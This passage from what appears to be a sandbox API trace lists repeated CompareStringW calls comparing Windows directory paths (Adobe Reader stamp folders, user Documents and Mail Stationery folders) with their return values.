cchCount2=80) returned 3 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount2=80) returned 3 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount2=80) returned 1 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount2=80) returned 3 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount2=80) returned 3 [0070.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount2=80) returned 3 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount2=48) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount2=48) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount2=48) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount2=48) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\", cchCount2=80) returned 3 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\", cchCount2=80) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\", cchCount2=80) returned 3 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\", cchCount2=80) returned 3 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\", cchCount2=80) returned 3 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\", cchCount2=80) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\", cchCount2=80) returned 1 [0070.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\", cchCount2=80) returned 3 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount2=80) returned 2 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 2 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount2=80) returned 1 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount2=80) returned 3 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount2=80) returned 3 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount2=80) returned 1 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 1 [0070.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 3 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 3 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount2=80) returned 3 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount2=80) returned 3 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 3 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 1 [0070.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 3 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 3 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 2 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount2=80) returned 3 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount2=80) returned 1 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount2=80) returned 3 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount2=80) returned 3 [0070.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount2=80) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount2=80) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount2=80) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount2=80) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount2=80) returned 1 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount2=80) returned 3 [0070.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount2=80) returned 3 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount2=80) returned 3 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 